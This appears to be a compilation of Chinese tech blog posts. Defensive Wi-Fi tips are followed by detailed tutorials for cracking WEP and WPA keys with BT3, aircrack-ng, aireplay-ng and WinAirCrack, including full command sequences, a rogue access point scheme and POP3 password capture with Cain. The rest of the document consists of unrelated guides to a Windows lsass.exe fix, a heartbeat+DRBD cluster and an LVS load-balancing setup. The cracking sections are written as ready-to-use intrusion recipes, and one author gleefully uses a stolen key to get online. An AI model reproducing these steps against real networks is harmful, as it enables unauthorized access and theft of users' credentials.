随着无线技术的发展，破解和入侵手段也变的越来越高明。很多破解无线加密的工具开始逐渐为人所知，也就是说在用户采取安全措施的同时，只要入侵者能搜索到你的网络，就有可能进行破解。但如果我们适当的控制信号覆盖范围，就能彻底保证网络的安全性。

现在大多数无线路由器都具备功率调节功能，这样用户就可以缩小自己的无线网络覆盖范围，使得屋外或相邻的空间内搜索不到你的无线信号，从而保证安全。
有关无线路由器和无线AP差别,详情请参见条目:教你如何区分无线路由器和无线AP差别。

常见防御手段

Mac地址控制

随着无线路由器价格的不断下调，很多个人用户甚至是只有一台电脑的朋友都开始倾向于组件无线网络。
有关交换机、集线器、路由器三者的区别，详情请参见条目:交换机、集线器、路由器区别和使用浅谈。

对于以上这种情况，我们建议您采用Mac地址控制功能，将客户端的Mac地址添加到允许访问通过的列表中，以确保别人无法进入你的无线网络。

善用访问列表

开启无线路由器的访问控制列表功能可以具体地指定允许哪些机器连接到访问点，从而让使用者做到心中有数，尽可能的避免其他非法连接。

三关闭 一开启

    * 关闭SSID：

SSID可以让无线客户端对不同无线网络进行识别。一般SSID都是被无线路由器广播出去的，客户端只有收到这个参数或者手动设定与AP相同的SSID才能连接到无线网络。而我们如果把这个广播禁止，一般的漫游用户在无法找到 SSID的情况下是无法连接到网络的。

    * 关闭DHCP：

关闭DHCP的目的在于入侵者将不得不破解你的IP地址、子网掩码及其它所需的TCP/IP参数，因为如果入侵者不知道你的IP地址，就无法利用你的无线网络进行任何操作。

    * 关闭SNMP：

关于SNMP设置，或者改变公开及专用的共用字符串。以防止黑客利用SNMP获得有关你方网络的重要信息。

    * 开启无线加密：

与WEP加密相比，目前的WPA甚至其第二代技术已经相当完善了。不过，对于企业级用户来说可能还需要在此基础上进行加强，例如对办公区的用户进行分类授权等方法；但对于个人用户的网络安全来说,WPA几乎可以使我们免受一切攻击。我们需要作的只是在路由器设置列表里加上密码，以防止非法入侵和保护终端上文件的安全。

总结

很多时候，无线网络的安全问题其实并不是处于产品本身的原因，而是由于我们没有使用合适的工具或者充分发挥产品本身的性能优势。随着破解技术和相关工具的发展，一些非常规入侵手段也频频出现，如果您愿意了解更多关于无线安防的资料，不妨参考无线网络的攻与防一文。

BT3 破解有客户端无线WEP密码成功 完美支持Intel 2200BG

刚在BT3下用2200破解了一个wep加密了的无线网络，写一下具体的方法，我想2200的卡还是非常普及的，有兴趣的可以试试看。
完整的命令如下
rmmod ipw2200
modprobe ipw2200 rtap_iface=1
iwconfig eth1 ap <AP MAC>
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed
fconfig eth1 up
ifconfig rtap0 up
airodump-ng --channel <Access Point channel> --bssid <AP MAC> -w dumpfile rtap0
这时你观察station下面是不是有对方的机器，如果客户端有在上网，那么station下面就会有对方的MAC,记下来。
5、打开新的窗口，输入
aireplay-ng --arpreplay -b <AP MAC> -h <客户机的 MAC> -i rtap0 eth1
此时如果对方有客户端在上网，那么DATA的数据会增加，我刚才的情况是有客户端，但是RXQ信号很弱，差不多只有13左右，10分钟才增加了300个 date，不过10分钟后RXQ超过50，接着DATA极速增加，此时在第5步打开的窗口中，ARP得到的数据也会同时增加。
6、当DATA超过100000后，打开新的窗口，输入
aircrack-ng -z -b <AP MAC> dumpfile*.cap
然后就大功告成，抄下密码，上网去吧，嘿嘿。
上面就是BT3光盘启动下，最简单的破解有客户端WEP的全部过程，如果信号好的话，估计也就10来分钟搞定。
Ps：上面命令中的< >是不需要的。

国外的网站上专门有一篇介绍2200破解的，具体原理可参考 http://tinyshell.be/aircrackng/forum/index.php?topic=1775.0

backtrack3(BT3) usb版 破解WEP无线网络密码详细步骤

一、先开始制作启动U盘：将下载好的backtrack3(BT3) usb版(下载地址在文章末尾)文件bt3b141207.rar直接解压到U盘（1G以上容量）。把Boot 和BT3两个文件夹放到U盘的根目录，打开BOOT文件夹双击运行" bootinst.bat "批处理文件。U盘里就会多出4个文件." isolinux.boot" "isolinux.cfg" "isolinux.bin " "syslinux.cfg" （如果想要中文截面的BT3的菜单,就在下载BT3中文语言包。下载地址：http://file.mofile.com/cn/docs/listallfiles.do 提取密码：4871454552251231。（用的是免费的网络硬盘,广告较多,有些朋友可能没认真看没找到，我说下大概位置，输入提取码后,拉到中间找下面的几个字(红色的) 以下这三个链接后两个均可下载
推荐快车（flashget）高速下载文件 下载文件(IE浏览器) 下载文件(非IE浏览器)
）把压缩包里的"中文包"解压出来，将里面的*.lzm文件拷贝到u盘的BT3\modules目录，即可实现bt3中文化。）

二、之后重启 windows 进入BIOS设置，把BIOS里的frist boot device设置为USB-HDD（或者是USB--ZIP）再重启选择从usb启动。系统进入backtrack3 系统。

三、现在开始破解
1.在shell窗口中输入 ifconfig 命令 ，出现如下信息：
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:（......）Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

2.找出你的无线网卡名字，我这里是 eth1.再启动你的网卡为Moniter模式(输入airmon-ng start eth1 11)。再输入 ifconfig 命令 ，返回如下信息：
lo no wireless extensions.
eth0 no wireless extensions.
eth1 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

3. 输入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.
命令中的11 表示要破解的频道号，bssid后面的数字表示破解目标的MAC物理地址，outputs表示要生成的包的名称。回车运行。

4.再开一个 shell 输入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
其中“targetnet”表示破解目标网络名,00:1A:01:8D:C3:B2前面已解释过是指目标MAC物理地址，00:A1:C1:D8:A5:B6表示本机网卡MAC物理地址

5.再开一个 shell 输入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1
获取更多的数据包。

6.返回数据量到1万的时候就可以破解了。再开一个shell输入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 进行破解。如果破解不成功，让它继续抓包，直到破解。

注：backtrack3(BT3) usb版下载地址：BT3(backtrack3) usb版 下载地址列表

破解无线网络WEP/WPA密钥

1、破解软件简介
　　WinAirCrackPack工具包是一款无线局域网扫描和密钥破解工具，主要包括airodump和aircrack等工具。它可以监视无线网络中传输的数据，收集数据包，并能计算出WEP/WPA密钥。

2、实验环境系统组成
　2.1 硬件环境
　　选用具有WEP和WPA加密功能的无线路由器或AP一台
　　带有迅驰无线网卡的笔记本电脑两台(分别定义为STA1和STA2，作为合法无线接入用户)
　　抓包无线网卡一块
　　笔记本电脑一台(定义为STA3，作为入侵者)
　2.2 软件环境
　　入侵者STA3 :WinAirCrackPack工具包，
　　注意:STA3要开启在控制面板->管理工具->服务中开启Wireless Zero Config服务。

3、实验拓扑图
     略。

4、配置无线路由器(根据实际网络环境进行配置)
　　(1)STA1连接上无线路由器(默认未加密)。右键单击屏幕下的 图标，选择“查看可用的无线网络”，弹出如图1所示的窗口。
　　其中显示有多个可用的无线网络，双击TP-LINK连接无线路由器，一会儿就连接成功。
　　(2)打开IE浏览器，输入IP地址:192.168.1.1(无线路由器默认局域网IP地址)。
　　(3)登录无线路由器管理界面(用户名:admin,密码:admin)。
　　单击界面左侧的“网络参数”下的“LAN口设置”选项，设置“IP地址”为192.168.1.8并保存，如图4所示。
　　(4)打开IE浏览器，输入IP地址:192.168.1.8，重新登录无线路由器管理界面(注意本实验选择TP-LINK无线路由器，其他品牌产品如CISCO等均有类似配置选项)，单击界面左侧的“无线设置”下的“基本设置”选项。
　　1)选择“模式”为“54Mbps(802.11g)”;
　　2)选择“密钥格式”为“ASCII码”;
　　3)选择“密钥类型”为“64位”;
　　4)设置“密钥1”为“pjwep”;
　　5)单击“保存”。
　　(5)当无线路由器设置好WEP密钥后，STA1需要重新连接上无线路由器(输入的密钥与无线路由器设置的密钥相同)，一会儿就连接成功。
　　(6)打开IE浏览器，输入IP地址:192.168.1.8，重新登录无线路由器管理界面，单击界面左侧的“DHCP服务器”下的“DHCP服务”选项，单击“不启用”并保存,如图8所示，单击“系统工具”下的“重启路由器”对路由器进行重启。

5、破解WEP、WPA密钥的软件下载
http://www.xdowns.com/soft/1/66/2007/Soft_39170.html

基于802.11的嗅探工具集，具有破解wep密钥等功能

aircrack.exe 原WIN32版aircrack程序
airdecap.exe      WEP/WPA解码程序
airodump.exe 数据帧捕捉程序
Updater.exe WIN32版aircrack的升级程序
WinAircrack.exe      WIN32版aircrack图形前端
wzcook.exe 本地无线网卡缓存中的WEPKEY记录程序

我们本次实验的目的是通过捕捉适当的数据帧进行IV（初始化向量）暴力破解得到WEP KEY，因此只需要使用airodump.exe（捕捉数据帧用）与WinAircrack.exe（破解WEP KEY用）两个程序就可以了

6、安装抓包无线网卡
　　注:用于抓包无线网卡的驱动采用Atheros v4.2.1，该卡必须采用Atheros AR5001, AR5002, AR5004, AR5005 或 AR5006芯片组，下表的网卡均可使用，本实验我们采用Netgear 的108M无线网卡(型号:WG511T)。
　　(1)在STA3笔记本上安装抓包无线网卡驱动。插入无线网卡，弹出如图11所示的窗口。选择“否，暂时不”，单击“下一步”。
　　(2) 选择“从列表或指定位置安装”，单击“下一步”。
　　(3)选择“不要搜索”，单击“下一步”。
　　(4)单击“从磁盘安装”，在弹出的窗口中单击“浏览”，选择E:\WinAircrackPack\atheros421@(目录下的net5211文件，单击“打开”，然后单击“确定”，单击“下一步”，在安装的过程中弹出如图15所示的窗口。

7、破解WEP密钥
　　(1)让STA1和STA2重新连接上无线路由器。
　　(2)在STA3笔记本电脑上运行airodump，该工具用来捕获数据包，按提示依次选择“16”:破解所用无线网卡的序号;
　　“a”，选择芯片类型，这里选择atheros芯片;
　　“6”，信道号，一般1、6、11是常用的信道号，选择“0”可以收集全部信道信息;
　　“testwep”(该输入文件名可任意);
　　“y”，破解WEP时候选择“y”，破解WPA时选择“n”。
　　(3)回车后，进入以下界面。
　　(4)当该AP的通信数据流量极度频繁(比如可以采用STA1与STA2对拷文件来产生数据流量)，“Packets”所对应的数值增长速度就会越大。当大概抓到30万(如采用104位RC4加密需要抓到100万包)“Packets”时关闭airodump窗口，启动 WinAircrack。
　　(5)点击左侧的“General”进行设置，选择加密类型为“WEP”，添加捕获的文件(testwep.ivs)。
　　(6)点击左侧的“Advanced”进行设置，选择“Aircrack”所在的位置。
　　(7)全部设置完后，点击右下角的“Aircrack the key”按钮弹出以下窗口。
　　(8)选择要破解网络的BSSID(本实验选择“1”)，回车得到最终WEP密钥。

8、破解WPA密钥
　　(1)修改无线路由器的加密类型和加密方法，并设置为WPA-PSK认证和TKIP加密方式。
　　(2)在STA3笔记本上运行airodump，该工具用来捕获数据包，按提示依次选择“16”，“a”，“6”，“testwpa”(该输入文件名可任意)，“n”。
　　(3)回车后，进入以下界面
　　(4)让STA1重新连接上无线路由器，airodump将捕获一个无线路由器与STA1四次握手的过程。
　　(5)启动WinAircrack。
　　(6)点击左侧的“General”进行设置，选择加密类型为“WPA-PSK”，添加捕获的文件(testwpa.cap)。
　　(7)点击左侧的“Wpa”进行设置，选择一个字典文件(口令字典可下载:例如lastbit.com/dict.asp)。
　　(8)全部设置完后，点击右下角的“Aircrack the key”按钮弹出以下窗口，可知已经捕获到一次握手的过程。
　　(9)选择要破解网络的BSSID(本实验选择“2”)，回车后经过几分钟的计算，最终得到WPA密钥。

9、破解密钥后对网络的危害一例(伪造AP)
　　一旦入侵者知道了无线网络的WEP或WPA密钥，就可以连接到本地局域网内，这样入侵者就享有与正常接入用户一样对整个网络访问的权限，进行深度攻击。入侵者可以利用IPBOOK,SuperScan 等类似这样的工具扫描局域网内的计算机，计算机里面的文件、目录、或者整个的硬盘驱动器能够被复制或删除，甚至其他更坏的情况诸如键盘记录、特洛伊木马、间谍程序或其他的恶意程序等等能够被安装到你的系统中，这样后果是非常严重的。
　　(1)简介
　　当WEP或WPA密码被破解后，入侵者可能用该密码和其他无线接入点(AP)构造一个假网络，当伪装AP的信号强于正常AP或用户靠近伪装 AP时，正常用户会很自然的接入到该假网络中，对于用户本身来说是感觉不到该网络的，就在用户正常收发邮件时，我们可以用类似CAIN这样的工具进行POP3、telnet等口令的破解等攻击。
　　(2)POP3口令破解
　　1)打开CAIN。
　　2)点击菜单栏“Configure”弹出以下窗口。
　　3)选择一个将用于抓包的网络适配器，点击“确定”，选择“ ”和“ ”，然后点击“ ”开始监控抓包。
　　4)正常用户开始收邮件，该软件可以对邮箱的登陆名和密码进行捕获。
　　(3)被破解后的危害
　　当黑客窃取了你的邮箱的用户名、密码、POP3服务器和SMTP服务器的IP地址后，就可以直接访问你的邮箱，你的邮件信息将完全暴露在黑客面前。

奇异的lsass.exe系统错误：终结点格式无效

今天LP说家里的机器进不了系统。晚上下班看了下：

开机进入桌面前出现lsass.exe系统错误，提示：终结点格式无效。点击确认后机器重起，然后又出现同样错误提示。

试着F8还能进安全模式，查了半天病毒和恶意插件，驱动什么的都没啥问题，唯一异常的是日志满了，清空日志还是不行。

网上找了些类似的问题，无非就是病毒、插件、驱动问题。各种方式都试过了，关键是没有找到啥恶意插件。

最后看了看系统还没打SP3，呵呵，终于想到一个奇技淫巧：装Windows XP SP3。进入带网络的安全模式，拷贝一份SP3安装程序，安装重启，OK解决问题。登录前居然又报日志满，进去看看也没异常，清空。

Linux高可用(HA)集群笔记heartbeat+drbd+nfs

by：http://blog.vfocus.net

heartbeat+drbd

    如果主服务器宕机，造成的损失是不可估量的。要保证主服务器不间断服务，就需要对服务器实现冗余。在众多的实现服务器冗余的解决方案中，heartbeat为我们提供了廉价的、可伸缩的高可用集群方案。我们通过heartbeat+drbd在Linux下创建一个高可用(HA)的集群服务器。
    DRBD是一种块设备，可以被用于高可用(HA)之中。它类似于一个网络RAID-1功能。当你将数据写入本地文件系统时，数据还将会被发送到网络中另一台主机上。以相同的形式记录在一个文件系统中。本地(主节点)与远程主机(备节点)的数据可以保证实时同步。当本地系统出现故障时，远程主机上还会保留有一份相同的数据，可以继续使用。在高可用(HA)中使用DRBD功能，可以代替使用一个共享盘阵。因为数据同时存在于本地主机和远程主机上。切换时，远程主机只要使用它上面的那份备份数据，就可以继续进行服务了。

安装heartbeat

[root@manager src]# rpm -ivh e2fsprogs-1.35-7.1.i386.rpm
[root@manager src]# tar zxvf libnet.tar.gz
[root@manager libnet]# ./configure
[root@manager libnet]# make
[root@manager libnet]# make install
[root@manager src]# tar zxvf heartbeat-2.1.2.tar.tar
[root@manager src]# cd heartbeat-2.1.2
[root@manager heartbeat-2.1.2]# ./ConfigureMe configure
[root@manager heartbeat-2.1.2]# make
[root@manager heartbeat-2.1.2]# make install
[root@manager heartbeat-2.1.2]# cp doc/ha.cf /etc/ha.d/
[root@manager heartbeat-2.1.2]# cp doc/haresources /etc/ha.d/
[root@manager heartbeat-2.1.2]# cp doc/authkeys /etc/ha.d/
[root@manager heartbeat-2.1.2]# cd /etc/ha.d/
开始编辑配置文件（两台机器上都需要安装和配置）
(heartbeat的配置比较简单，网上也有很多例子，这里就不多废话了)

开始编译安装DRBD

[root@manager root]# cp drbd-8.2.1.tar.tar /usr/src/
[root@manager root]# cd /usr/src/
[root@manager src]# tar zxvf drbd-8.2.1.tar.tar
[root@manager src]# cd drbd-8.2.1
[root@manager src]# make KERNVER=2.6.17.11 KDIR=/usr/src/linux-2.6.17.11

如果编译顺利可以看到Module build was successful.
[root@manager drbd-8.2.1]# make install

可以编辑配置文件了

[root@manager drbd-8.2.1]# vi /etc/drbd.conf
在manager和manage_bak上都需要安装drbd服务。
分别在两台机器上配置好/etc/drbd.conf
[root@manager_bak root]# grep -v "#" /etc/drbd.conf
global {
    usage-count yes;                  （是否参加使用者统计，yes为参加）
}
common {
  syncer { rate 300M; }
}
resource r0 {
  protocol C;                            （数据同步协议，C为收到数据并写入后返回，确认成功）
  disk {
    on-io-error   detach;
     size 100G;                         （由于实验环境下两台服务器硬盘大小不同，所以需要设置drbd的大小）
  }
  net {
    after-sb-0pri disconnect;
    rr-conflict disconnect;
  }
  syncer {
    rate 300M;                           （设置网络同步速率）
    al-extents 257;
  }
  on manager_bak {
    device     /dev/drbd0;
    disk       /dev/sda3;
    address    192.168.0.2:7788;
    meta-disk  internal;
  }
  on manager {
    device    /dev/drbd0;
    disk      /dev/sdc;
    address   192.168.0.1:7788;
    meta-disk internal;
  }
}

在启动DRBD之前，需要创建供DRBD记录信息的数据块.分别在两台主机上执行：

[root@manager ha.d]# drbdadm create-md r0
[root@manager ha.d]#mknod /dev/drbd0 b 147 0
[root@manager ha.d]# /etc/init.d/drbd srart

现在两台主机都是备机状态，都是”不一致”状态，这是由于DRBD无法判断哪一方为主机，以哪一方的磁盘数据作为标准数据。所以我们需要初始化，在manager上执行：

[root@manager /]#drbdsetup /dev/drbd0 primary –o

现在数据开始同步，可以用cat /proc/drbd查看数据同步的进度
等数据同步完查看DRBD的状态

[root@manager /]# cat /proc/drbd
version: 8.2.1 (api:86/proto:86-87)
GIT-hash: 318925802fc2638479ad090b73d7af45503dd184 build by root@manager, 2007-12-05 16:40:14
0: cs:Connected st Primary/Secondary ds:UpToDate/UpToDate C r---
    ns:1514 nr:1110 dw:2616 dr:2259 al:0 bm:482 lo:0 pe:0 ua:0 ap:0
        resync: used:0/31 hits:2 misses:2 starving:0 dirty:0 changed:2
        act_log: used:0/257 hits:202 misses:0 starving:0 dirty:0 changed:0
磁盘状态都是”实时”，表示数据同步完成了。

[root@manager /]# mkfs.xfs /dev/drbd0

现在可以把manager上的DRBD设备挂载到/export目录上进行使用。备机的DRBD设备无法被挂载，因为它是用来接收主机数据的，由DRBD负责操作。

[root@manager /]# mount /dev/drbd0 /export
[root@manager /]# df
Filesystem           1K-blocks      Used Available Use% Mounted on
/dev/sda1             10229696   3019636   7210060  30% /
/dev/drbd0           104806400   3046752 101759648   3% /export

现在把之前备份的/export中的所有内容再恢复回去。
如果不使用heartbeat的情况下，DRBD只能手工切换主从关系
现在修改heartbeat的配置文件，使DRBD可以通过heartbeat自动切换

[root@manager /]# vi /etc/ha.d/haresources
manager 192.168.0.3 drbddisk::r0 Filesystem::/dev/drbd0::/export::xfs  dhcpd xinetd portmap nfs

注释：上面那行
manager                                              定义manager为heartbeat的主机
192.168.0.3                                         定义对外服务的IP地址，这个IP自动在主从机之间切换
drbddisk::r0                                         定义使用的drbd资源
Filesystem::/dev/drbd0::/export::xfs     定义挂载文件系统
dhcpd xinetd portmap nfs                    定义其他需要切换的服务（用空格隔开）

现在我们可以测试一下了

（dhcpd portmap nfs等需要切换的服务，应该先在两台服务器上都配置好）

[root@manager root]# chkconfig –list

确定heartbeat和DRBD开机自启动
确定需要由heartbeat切换的服务，开机不自启动（由heartbeat来启用相关的服务）
给gg1接通电源，通过pxe启动系统(gg1是一组服务器中的一台，是一台无盘服务器，启动后挂载在manager上保存的系统)
在manager上ssh gg1

[root@manager root]# ssh gg1
-bash-2.05b#
-bash-2.05b# arp -a
? (192.168.0.3) at 00:19:B9:E4:7D:22 [ether] on eth0
-bash-2.05b# ls
-bash-2.05b# touch test
-bash-2.05b# ls
test

现在在manager上关机或停止heartbeat服务
[root@manager root]# /etc/init.d/heartbeat stop
Stopping High-Availability services:                                                            [  OK  ]

到manager_bak上ifconfig
[root@manager_bak root]# ifconfig
可以看到eth1:0起来了，IP地址是192.168.0.3

[root@manager_bak root]# ssh gg1
-bash-2.05b#
-bash-2.05b# arp -a
? (192.168.0.3) at 00:19:B9:E5:3B:FC [ether] on eth0 （可以看到192.168.0.3的mac地址变了）
-bash-2.05b# ls
test

可以看到在manager上ssh上gg1后建立的test文件
-bash-2.05b# echo "this is test" > test
-bash-2.05b# cat test
this is test

可以看到现在gg1可以正常读写manager_bak上nfs出来的磁盘
现在把manager上的heartbeat服务启动起来

[root@manager root]# /etc/init.d/heartbeat start
Starting High-Availability services:
2007/12/06_12:46:08 INFO:  Resource is stopped                                                   [  OK  ]
-bash-2.05b# cat test
this is test

现在终于大功告成了，之前在不使用drbd的情况下，heartbeat也可以切换apache、dhcpd、portmap、nfs等等服务，但是 nfs服务切换后，必须重新mount一下nfs共享出来的目录，否则会报 Stale NFS file handle 的错误。现在heartbeat+drbd配合使用后，nfs等等服务可以无缝切换，不必再重新mount一下nfs目录了

lvs+heard负载均衡文档(DR)

blog：http://blog.vfocus.net

测试环境：
硬件 两台dell1950 （单硬盘）
系统 FC7
软件 ipvsadm-1.24 heartbeat-2.1.2
说明 一台172.16.3.75 (lvsdr)作为主director服务器
     172.16.3.73 (lvsdrbak)作为热备director服务器
     虚拟ip为172.16.3.76
     采用基于DR的模式进行负载均衡

算法采用的是轮叫调度（Round-Robin Scheduling） 即ipvsadm –rr模式

注1:(本次测试为节约机器，将备份节点也作为一台realserver)
注2：算法模式一共有7种分别是
加权轮叫调度（Weighted Round-Robin Scheduling）
最小连接调度（Least-Connection Scheduling）
加权最小连接调度（Weighted Least-Connection Scheduling）
基于局部性的最少链接（Locality-Based Least Connections Scheduling）
带复制的基于局部性最少链接（Locality-Based Least Connections with Replication Scheduling）
目标地址散列调度（Destination Hashing Scheduling）
源地址散列调度（Source Hashing Scheduling）
只需要改变ipvsadm后面的参数
ipvsadm -rr 论叫调度
rr|wrr|lc|wlc|lblc|lblcr|dh|sh|sed|nq

一，配置基于隧道（DR）模式的LVS集群

所需软件 ipvsadm-1.24 http://www.linuxvirtualserver.org/software/
需要建立一个软链接把内核指向/usr/src/linux

ln -s /usr/src/kernels/2.6.9-42.EL-i686/ /usr/src/linux
tar zxvf ipvsadm-1.24.tar.gz
cd ipvsadm-1.2.4
make;make install

1）在lvsdr上部署（备份节点做完全一样的部署）

$ vi /etc/rc.d/init.d/lvsDR

#!/bin/bash
VIP=172.16.3.76
RIP1=172.16.3.73
RIP2=172.16.3.235
. /etc/rc.d/init.d/functions
case "$1" in
start)
echo "start LVS of DirectorServer"
#Set the Virtual IP Address
/sbin/ifconfig lo:0 $VIP broadcast $VIP netmask 255.255.255.255 up
/sbin/route add -host $VIP dev lo:0
#Clear IPVS Table
/sbin/ipvsadm -C
#Set Lvs
/sbin/ipvsadm -A -t $VIP:80 -s rr
/sbin/ipvsadm -a -t $VIP:80 -r $RIP1:80 -g
/sbin/ipvsadm -a -t $VIP:80 -r $RIP2:80 -g
#Run Lvs
/sbin/ipvsadm
#end
;;
stop)
echo "close LVS Directorserver"
/sbin/ipvsadm -C
;;
*)
echo "Usage: $0 {start|stop}"
exit 1
esac

2）在realserver上部署

$ vi /etc/rc.d/init.d/realserverDR

#!/bin/sh
VIP=172.16.3.76
/sbin/ifconfig lo:0 $VIP broadcast $VIP netmask 255.255.255.255 up
/sbin/route add -host $VIP dev lo:0
echo "1" > /proc/sys/net/ipv4/conf/lo/arp_ignore
echo "2" > /proc/sys/net/ipv4/conf/lo/arp_announce
echo "1" > /proc/sys/net/ipv4/conf/all/arp_ignore
echo "2" > /proc/sys/net/ipv4/conf/all/arp_announce
sysctl -p
~

二，安装heartbeat

所需软件
e2fsprogs-1.40.4.cfs1-0redhat.i386.rpm 光盘中有
libnet http://www.packetfactory.net/libnet
heartbeat-2.1.2.tar.gz http://linux-ha.org/download/

安装软件
安装e2fsprogs

rpm -ivh e2fsprogs-1.35-7.1.i386.rpm

安装libnet

tar zxvf libnet.tar.gz
cd libnet
./configure
make;make install

安装heartbeat

tar zxvf heartbeat-2.0.2.tar.gz
cd heartbeat-2.0.2
./Configureme configure
make;make install
cp doc/ha.cf doc/haresources doc/authkeys /etc/ha.d/
cp ldirectord/ldirectord.cf /etc/ha.d/
groupadd -g 694 haclient
useradd -u 694 -g haclient hacluster

修改配置

重点三个配置文件
ha.cf haresources authkeys

1， ha.cf

[root@lvsdrbak src]# awk '/^[^$]/&&/^[^#]/' /etc/ha.d/ha.cf
debugfile /var/log/ha-debug
logfile /var/log/ha-log
logfacility local0
keepalive 2
deadtime 30
warntime 10
initdead 120
udpport 694
bcast eth0 # Linux
auto_failback on
node lvsdr
node lvsdrbak
hopfudge 1

2， haresources

这个文件其实就只有一行
lvsdr IPaddr::172.16.3.76 ldirectord lvsDR

3， authkeys

auth 1
1 sha1 key-for-sha1-any-text-you-want
chmod -R 600 autykeys 权限必须是600

以上三个文件 主从服务器上一致

修改hosts

$ vi /etc/hosts

127.0.0.1 localhost.localdomain localhost
172.16.3.75 lvsdr
10.1.1.3 HA01
10.1.1.2 HA02
172.16.3.73 lvsdrbak

其中10.1.1.3与10.1.1.2是在eth0上绑的另外ip作为检测heartbeat用

三，配置ldirectord

Ldirectord的作用是监测Real Server，当Real Server失效时，把它从Load Balancer列表中删除，恢复时重新添加，在安装heartbeat时已经安装了Ldirectord。

但是在fc7中启动ldirectord会报缺少Mail/Send.pm或者LWP/useragant模块，需要安装perl模块

所需模块
lwp/useagant http://search.cpan.org/CPAN/authors/id/G/GA/GAAS/libwww-perl-5.808.tar.gz
mailsend http://search.cpan.org/CPAN/authors/id/M/MA/MARKOV/MailTools-2.02.tar.gz

生成makefile：　
perl Makefile.PL

建立模块　
make

测试模块　
make test

如果测试结果报告“all test ok”，您就可以放心地安装编译好的模块了。安装模块前，先要　
make install

配置 ldirectord 配置文件在/etc/ha.d/ldirectord.cf

[root@lvsdr lvs]# awk '/^[^$]/&&/^[^#]/' /etc/ha.d/ldirectord.cf

checktimeout=3
checkinterval=1
autoreload=yes
logfile="/var/log/ldirectord.log"
quiescent=yes
virtual=172.16.3.76:80

real=172.16.3.73:80 gate
real=172.16.3.235:80 gate
service=http
request="test.html"
receive="Test Page"
scheduler=rr
protocol=tcp
#checktype=negotiate
#checkport=80
#request="index.html"
#receive="Test Page"
#virtualhost=www.x.y.z测试 ldirectord是否可以起来

现在可以在主节点172.16.3.75启动heartbeat

/etc/init.d/heartbeat start

起来正常的结果应该是这样

[root@lvsdr src]# netstat -npl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 :::22 :::* LISTEN 2095/sshd
udp 0 0 0.0.0.0:32784 0.0.0.0:* 28530/heartbeat: wr
udp 0 0 0.0.0.0:694 0.0.0.0:* 28530/heartbeat: wr

[root@lvsdr src]# ifconfig
eth0   Link encap:Ethernet HWaddr 00:15:C5:EF:E0:D9
       inet addr:172.16.3.75 Bcast:172.16.3.255 Mask:255.255.255.0
       inet6 addr: fe80::215:c5ff:feef:e0d9/64 Scope:Link
       UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
       RX packets:58138 errors:0 dropped:0 overruns:0 frame:0
       TX packets:17891 errors:0 dropped:0 overruns:0 carrier:0
       collisions:0 txqueuelen:1000
       RX bytes:8955674 (8.5 MiB) TX bytes:3217775 (3.0 MiB)
       Interrupt:16 Memory:f8000000-f8012100

eth0:0 Link encap:Ethernet HWaddr 00:15:C5:EF:E0:D9
       inet addr:172.16.3.76 Bcast:172.16.3.255 Mask:255.255.255.0
       UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
       Interrupt:16 Memory:f8000000-f8012100

eth0:1 Link encap:Ethernet HWaddr 00:15:C5:EF:E0:D9
       inet addr:10.1.1.3 Bcast:10.1.1.255 Mask:255.255.255.0
       UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
       Interrupt:16 Memory:f8000000-f8012100

lo     Link encap:Local Loopback
       inet addr:127.0.0.1 Mask:255.0.0.0
       inet6 addr: ::1/128 Scope:Host
       UP LOOPBACK RUNNING MTU:16436 Metric:1
       RX packets:2493 errors:0 dropped:0 overruns:0 frame:0
       TX packets:2493 errors:0 dropped:0 overruns:0 carrier:0
       collisions:0 txqueuelen:0
       RX bytes:1339237 (1.2 MiB) TX bytes:1339237 (1.2 MiB)

tunl0  Link encap:IPIP Tunnel HWaddr
       inet addr:172.16.3.76 Mask:255.255.255.255
       UP RUNNING NOARP MTU:1480 Metric:1
       RX packets:0 errors:0 dropped:0 overruns:0 frame:0
       TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
       collisions:0 txqueuelen:0
       RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

测试：关闭主节点，备份节点将自动接管directorserver服务。

四，把备份节点也作为realserver

1. 在上述DR节点做的以外，备份节点还需要也添加realserver脚本

另外需要添加关闭备用节点的脚本

[root@lvsdr lvs]# vi /etc/rc.d/init.d/closeDR
VIP=172.16.3.76
. /etc/rc.d/init.d/functions
case "$1" in
    start)
        echo "start director server and close dr"
        ifconfig lo:0 down
        echo 1 > /proc/sys/net/ipv4/ip_forward
        echo 0 > /proc/sys/net/ipv4/conf/all/arp_announce
        ;;
    stop)
        echo "start Real Server"
        ifconfig lo:0 $VIP netmask 255.255.255.255 broadcast $VIP up
        /sbin/route add -host $VIP dev lo:0
        echo "1" >/proc/sys/net/ipv4/conf/lo/arp_ignore
        echo "2" >/proc/sys/net/ipv4/conf/lo/arp_announce
        echo "1" >/proc/sys/net/ipv4/conf/all/arp_ignore
        echo "2" >/proc/sys/net/ipv4/conf/all/arp_announce
        sysctl –p

        ;;
    *)
        echo "Usage: lvs {start|stop}"
        exit 1
esac

